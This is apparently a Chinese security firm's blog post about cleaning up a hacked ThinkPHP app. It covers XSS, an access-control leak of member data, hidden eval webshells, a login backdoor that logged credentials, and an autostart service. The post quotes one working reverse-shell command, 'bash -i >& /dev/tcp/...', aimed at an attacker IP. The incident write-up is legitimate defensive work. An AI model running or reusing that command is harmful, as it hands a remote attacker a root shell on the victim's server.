您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

APP数据被篡改泄露阿里云提示发现webshell后门处理解决

时间:2022-09-01 17:24:19  来源:  作者: 网站安全服务器安全

相信有很多站长以及运营网站App的技术人员都有一些安全上的困扰,尤其是对网站代码里存在后门文件,以及服务器被植入木马病毒的安全问题很闹心,前段时间我们SINE安全接到客户的安全咨询,说是找的第三方开发公司做的APP和后台,运营起来差不多3个月,一开始注册的会员量不是很多,当注册达到成千上万个会员注册量的时候,就相继出现了安全上的问题,数据库总是被篡改,会员信息泄露,以及被阿里云提示的云安全中心,安全事件提醒,尊敬的*玉:云盾云安全中心检测到您的服务器:47.180.*.*(主服务器)出现了紧急安全事件:自启动后门,建议您立即进行处理。进程异常行为-反弹Shell和异常网络连接-反弹shell网络外连以及恶意脚本代码执行还有linux可疑命令序列恶意软件-后门程序等告警,针对这些安全问题,SINE安全老于来给大家科普一下,如何去除网站后门木马以及代码漏洞检测等问题。

攻击情况介绍:

当天我们SINESAFE收到客户的电话咨询,客户的平台、APP和H5端、以及后台遭到黑客入侵,并篡改了数据库里面的数据,导致平台的损失过万,详细询问了客户的平台架构以及部署的服务器数量,发现客户用的是Thinkphp架构开发,APP的API接口和H5端以及后台管理都是在该架构的基础上开发的,因为这套代码是客户从买来后找的第三方公司进行的二次开发,第三方开发公司对里面的代码后门并不清楚,很多低价卖源码的,肯定是有利益可图的。建议大家买来后一定要对网站源码进行代码安全审计和网站后门审计服务,尤其是对准备刚上线的APP平台,对安全问题要重视起来,否则到了后期会员规模上来后,损失的就不止这一点了。

跟客户进行了详细的对接,梳理了所有的服务器的信息以及网站源码的位置,我们的SINE安全工程师立即将代码打包到本地,进行源代码安全审计,通过对用户注册以及APP里的具体功能代码,都进行了全面的人工漏洞测试,发现在留言反馈以及会员信息功能,存在XSS跨站漏洞,这个漏洞可以将XSS攻击代码植入到后台里去,当后台的管理人员查看了反馈的留言或用户的个人详情,就会直接触发该XSS漏洞,XSS漏洞可以获取到网站后台的地址,以及管理员的Session和cookies,有了这2个值,黑客就可以登录后台了,对APP里的API接口也进行详细的安全审计,发现存在会员信息泄露漏洞,由于未对UID值进行当前账号权限判断,可以越权查看其它UID的会员信息,像手机号以及注册时间,银行卡,钱包地址,密码等等的信息,都可以越权查看,我们SINE安全工程师对代码中的一些函数功能代码进行审计,检测出了源码作者留的一句话木马后门,而且还是加密形式免杀webshell,代码如下:

真是道高一尺魔高一丈,源码作者留的后门,手段非常高,一般的建站公司技术是没办法看出这个文件是木马代码的,我们对其网站的访问日志以及APP的接口日志进行人工检查,还发现了后台登录这里被黑客动了手脚,只要管理员登录成功会立即把用户名和密码写到/data/目录下的robots.txt文件中,建议大家日后做检查代码的时候先搜索下_encode关键词看看有没有可疑的,以及搜索关键词eval函数的都有哪些再调用,因为很多一句话木马都是调用的eval函数,通过对每个代码的安全审计发现上传功能的代码中存在上传后门具体代码如下:

后门真是太多了,防不胜防,辛亏客户找到了我们SINE安全对网站代码进行了详细的安全审计和漏洞测试,我们对网站的上传的目录进行了脚本执行权限控制,对eval的后门进行了强制删除,以及对管理后台登录这里的后门进行了修复,对一些XSS跨站攻击的代码进行了攻击防护,对所有get post变量提交的参数进行了安全过滤,凡是包含xss跨站代码的,以及非法植入攻击代码的都进行了拦截过滤,并对整套代码进行了安全加固与防护,也同时对服务器进行了端口安全策略部署和基础安全设置,如注册表权限,环境运行账户权限,MySQL数据库的权限分离设置,以及Nginx的运行账户进行了设置,防止通过网站后门木马进行提权拿到服务器权限,如果想要对网站代码进行后门查找和清除和漏洞人工测试服务的可以向网站漏洞修复服务商SINE安全或鹰盾安全以及启明星辰,大树安全等这些服务商寻求技术支持。针对阿里云的云安全中心安全事件提醒,我们让客户提供了阿里云账号和密码,登录后,对该安全事件的详情进行了查看,发现确实是黑客植入了自启动的后门,我们对Linux系统的自启动服务进行了查看,发现黑客植入的木马病毒,每次重启服务器都会自动启动该服务,向外发送连接请求,Command: bash -i >& / dev/tcp/1.15.235.160/25670>&1 该命令是直接反弹了Linux root SHELL到1.15.235.160黑客的服务器。我们对该IP进行了阿里云安全组IP限制,以及对系统里的自启动服务进行了删除与防篡改部署,至此客户的APP被黑客攻击以及篡改数据的问题得到了彻底的解决。也希望我们的解决过程分享,能帮到更多的人。



Tags:webshell后门   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,不构成投资建议。投资者据此操作,风险自担。如有任何标注错误或版权侵犯请与我们联系,我们将及时更正、删除。
▌相关推荐
APP数据被篡改泄露阿里云提示发现webshell后门处理解决
相信有很多站长以及运营网站或APP的技术人员都有一些安全上的困扰,尤其是对网站代码里存在后门文件,以及服务器被植入木马病毒的安全问题很闹心,前段时间我们SINE安全接到客户...【详细内容】
2022-09-01  Search: webshell后门  点击:(361)  评论:(0)  加入收藏
▌简易百科推荐
企业网站被攻击主要表现在哪些方面?
建企业网站只是功能实现,如果网站代码不够严谨有漏洞,再漂亮的网站也只是摆设,潜在风险害人害己。所以在建网站之初就一定要考虑好这个问题,如果系统建设不是强项可以选择一套主...【详细内容】
2023-12-18  三七一网络    Tags:网站   点击:(85)  评论:(0)  加入收藏
网站频繁被劫持怎么办?
域名劫持是互联网攻击的一种方式,通过攻击域名解析服务器(DNS),或伪造域名解析服务器(DNS)的方法,把目标网站域名解析到错误的IP地址从而实现用户无法访问目标网站的目的或者蓄意或...【详细内容】
2023-12-07  帝恩思DNS    Tags:被劫持   点击:(180)  评论:(0)  加入收藏
不可不知的Web安全指南
Web 已成为备受瞩目的攻击媒介,而 Web 安全对于确保企业的业务安全至关重要。如今黑客行为是一个公认的行业,而犯罪企业比以往任何时候都更加复杂且联系更加紧密。攻击一直在...【详细内容】
2023-09-18  云尖软件    Tags:Web安全   点击:(240)  评论:(0)  加入收藏
电商网站应对CC攻击的四大利器!
CC攻击是DDOS(分布式拒绝攻击)攻击的一种恶意手段,其原理是通过代理服务器或肉鸡向受害主机不断发起大量数据包,使目标服务器资源耗尽,导致其崩溃宕机。其特点在于使用真实且分散...【详细内容】
2023-07-19  诺必达云服务    Tags:CC攻击   点击:(205)  评论:(0)  加入收藏
你知道什么是堡垒机吗
在当今数字化时代,网络安全对于企业和组织来说至关重要。为了保护敏感数据和系统免受未经授权的访问和攻击,堡垒机成为一种必备工具。本文将介绍什么是堡垒机、其工作原理以及...【详细内容】
2023-07-14  职场小达人欢晓    Tags:堡垒机   点击:(144)  评论:(0)  加入收藏
如何防止黑客入侵服务器 预防黑客入侵有效方法
随着网络科技发展迅速,网络黑客手段越来越高明,不少人曾遭遇服务器被黑出现版本被盗,文件丢失,到那时候再补救就为时已晚了,那么平时如何防止黑客入侵服务器呢?一、采用NTFS文件系...【详细内容】
2023-05-25  芳芳分享汇    Tags:黑客入侵   点击:(304)  评论:(0)  加入收藏
我的网站被黑了,该如何排除漏洞并修复安全问题
随着时代的发展网站使用的频率是逐步增加。然而,随着互联网技术的不断进步,网站安全问题也引起了广泛关注。其中,最严重的问题是网站被黑客攻击。那么,何谓网站被黑?它可能会给企...【详细内容】
2023-05-18  Sinesafe网站安全    Tags:网站被黑   点击:(306)  评论:(0)  加入收藏
保护服务器机房物理安全的五种优秀实践
服务器机房是数字企业的心脏。无论是企业家还是经验丰富的IT专业人员,都知道服务器机房的安全性至关重要。如果没有采用适当的物理安全措施,其服务器很容易受到盗窃、人为破坏...【详细内容】
2023-05-17    企业网D1Net  Tags:服务器   点击:(288)  评论:(0)  加入收藏
CMS身份验证,保护您的网站!
在当今数字时代,网站安全至关重要。CMS是许多网站使用的内容管理系统,它们有助于管理和维护网站的内容。然而,CMS也是黑客攻击的常见目标,因此保护CMS非常重要。其中一个关键步...【详细内容】
2023-05-16  芳芳聊日常    Tags:身份验证   点击:(295)  评论:(0)  加入收藏
Linux系统服务器如何防止端口攻击?
端口攻击是指攻击者利用开放的端口来进入服务器、读取敏感信息和进行其他恶意行为。要防止 Linux 服务器的端口攻击,可以采取以下措施:1.配置防火墙:防火墙可以过滤非法流量,保...【详细内容】
2023-05-12  汽车车门的养护    Tags:端口攻击   点击:(351)  评论:(0)  加入收藏
相关文章
    无相关信息
站内最新
站内热门
站内头条